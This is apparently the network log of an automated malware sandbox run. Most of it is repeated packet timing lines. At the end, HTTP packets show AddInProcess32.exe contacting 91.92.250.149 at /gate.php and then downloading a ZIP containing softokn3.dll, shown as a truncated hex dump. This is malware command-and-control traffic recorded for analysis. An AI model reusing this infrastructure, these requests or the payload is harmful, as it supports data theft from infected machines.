                                                                                        Dec 16, 2023 18:16:57.940185070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940222979 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940248013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940287113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940309048 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940354109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940361023 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940382004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940399885 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940413952 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940455914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940484047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940500021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940519094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940561056 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940599918 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940613031 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940649986 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940661907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940699100 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940725088 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940767050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.940789938 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.940824986 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941075087 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941118956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941140890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941179037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941203117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941241980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941263914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941302061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941327095 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941364050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941395044 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941432953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941450119 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941484928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941493988 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941530943 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941551924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941587925 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941610098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941642046 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941657066 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941678047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941696882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941709995 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941728115 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941767931 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941806078 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941845894 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941868067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941903114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941926003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.941962004 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.941987038 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942029953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942039967 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942078114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942305088 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942347050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942368984 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942408085 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942414045 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942451000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942482948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942523956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942534924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942574024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942595959 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942636013 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942809105 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942850113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.942909002 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.942951918 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943012953 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943062067 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943136930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943176031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943224907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943267107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943301916 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943342924 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943437099 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943479061 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943501949 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943538904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943619967 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943662882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943671942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943711996 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943721056 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943743944 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943758011 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943777084 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943816900 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943854094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943876028 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.943916082 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.943979979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944024086 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944045067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944083929 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944133997 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944175959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944200039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944241047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944302082 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944348097 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944369078 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944407940 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944438934 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944480896 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944540024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944586992 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944610119 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944648027 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944680929 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944725990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944742918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944785118 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944801092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944833994 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944884062 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.944925070 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.944987059 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945027113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945096016 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945142031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945158005 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945195913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945396900 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945441961 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945451021 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945494890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945518970 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945557117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945566893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945580006 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945605993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945625067 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945653915 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945688009 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945722103 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945758104 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945790052 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945830107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945862055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945903063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945925951 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.945967913 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.945986986 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946031094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946038961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946078062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946192980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946238041 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946249008 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946284056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946295977 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946336031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946338892 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946377993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946397066 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946435928 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946460009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946501970 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946515083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946557999 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946564913 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946603060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946635962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946675062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946751118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946790934 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946814060 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946851015 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946873903 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946912050 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946927071 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.946964025 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.946985960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947042942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947058916 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947099924 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947171926 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947206974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947211027 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947238922 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947268009 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947304964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947316885 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947352886 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947376966 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947415113 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947432995 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947477102 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947498083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947535992 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947568893 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947606087 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947666883 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947710991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947734118 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947772980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947794914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947834969 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947854996 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947891951 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947902918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947940111 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.947962046 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.947999954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948023081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948065042 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948071957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948111057 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948143005 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948183060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948199034 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948232889 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948266029 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948307991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948355913 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948386908 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948396921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948415995 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948470116 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948509932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948544025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948582888 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948654890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948694944 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948714018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948750019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948772907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948813915 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948837042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948875904 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948898077 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.948934078 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.948962927 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949007988 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949040890 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949079990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949093103 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949132919 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949155092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949193954 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949230909 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949269056 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949317932 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949358940 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949381113 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949419022 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949434042 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949474096 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949506998 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949544907 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949608088 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949656963 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949665070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949702978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949713945 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949749947 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949771881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949810982 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949878931 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949919939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.949951887 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.949991941 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.950086117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.950130939 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.950190067 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.950229883 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:59.166794062 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:59.166843891 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:59.411993980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:59.412013054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:59.473079920 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:59.473273039 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:17:00.664129019 CET4972980192.168.2.491.92.250.149

                                                                                        HTTP Request Dependency Graph

                                                                                        • 91.92.250.149

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.44972991.92.250.149806600C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 16, 2023 18:16:55.658027887 CET96OUTGET /gate.php HTTP/1.1
                                                                                        Host: 91.92.250.149
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Dec 16, 2023 18:16:55.961082935 CET459INHTTP/1.1 200 OK
                                                                                        Date: Sat, 16 Dec 2023 17:16:55 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.45
                                                                                        X-Powered-By: PHP/5.4.45
                                                                                        Set-Cookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Pragma: no-cache
                                                                                        Content-Length: 24
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 66 48 78 38 66 48 77 31 63 55 52 73 55 48 56 57 53 32 39 53 66 41 3d 3d
                                                                                        Data Ascii: fHx8fHw1cURsUHVWS29SfA==
                                                                                        Dec 16, 2023 18:16:55.963288069 CET117OUTGET /request HTTP/1.1
                                                                                        Host: 91.92.250.149
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: PHPSESSID=71rd70sh6dtnf5jmu0ipn3agl5
                                                                                        Dec 16, 2023 18:16:56.208992004 CET1286INHTTP/1.1 200 OK
                                                                                        Date: Sat, 16 Dec 2023 17:16:56 GMT
                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.45
                                                                                        Last-Modified: Mon, 11 Dec 2023 20:43:42 GMT
                                                                                        ETag: "17e499-60c41fd4abebc"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 1565849
                                                                                        Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 07 5f 3a 8e 01 42 9c c6 9c 4f 50 d8 c9 28 b3 cd 78 78 8b 0a b7 ec 0a 0a 1e 77 b2 ae ab a0 39 37 a7 e3 05 49 60 05 f9 d2 45 c5 5d 5c 61 af 71 b2 4b 74 73 31 ba 39 fa de aa ea ee 99 ae ee e4 f4 b9 7f 8f e7 c1 aa a9 fe d5 fb fe de 8f 7a ab aa 1b 2b 97 ef 64 ac 0c c3 d8 e0 af 2c 33 4c 1b 43 fe 94 32 df e2 0f cb 30 99 e3 df c8 64 8e a4 9d 9a d0 c6 2e 3c 35 61 a9 ff fe 07 f3 1a 9b 36 de d7 b4 6a 7d de 9a 55 1b 36 6c 0c e6 ad 5e 97 d7 24 6c c8 bb 7f 43 5e d9 62 4f de fa 8d 6b d7 4d c9 c8 48 cf 57 44 3c d7 90 9f fb a7 8c 7b 16 ab 7f af 0b 1f 2e fe 1c da bb 36 2e 58 74 05 b7 77 2b ed e2 45 dd b8 5d b4 e8 cf d0 1e 5b 4f 9e df be 61 c1 a2 ab 78 ee 82 c5 8f e0 df 8b 16 7d 89 db 7b 16 fd 27 6e 8f 2e 26 6d 05 fe fd a3 fb d7 f8 91 1e d5 04 37 cf 30 0b d9 14 e6 ad d5 f1 15 ea d8 65 66 e2 84 e1 6c e6 70 e6 35 30 70 35 19 7b a6 1d fa 1c 74 ce b0 e8 27 87 fb 16 86 49 65 f0 6f ad 65 dc 16 ec cc b4 5f 5b e0 71 29 99 c4 31 4c a2 25 0d 67 b5 30 87 a0 6d 83 b6 0b 0d 16 5a 98 66 6b 92 6f 73 2c cc 99 71 28 10 16 a6 3e 13 d4 de 60 99 a5 cc e0 7f 0a 64 56 1f 33 e0 d9 60 19 1c 3f 25 b8 ae 39 08 ed 6f 8f 10 8a d8 56 9b 1e 93 c7 30 f5 53 9a d6 ae 0a ae 62 98 f4 32 c5 f6 72 68 df 60 93 61 48 6f e9 14 02 63 98 61 68 a2 45 91 65 a1 71 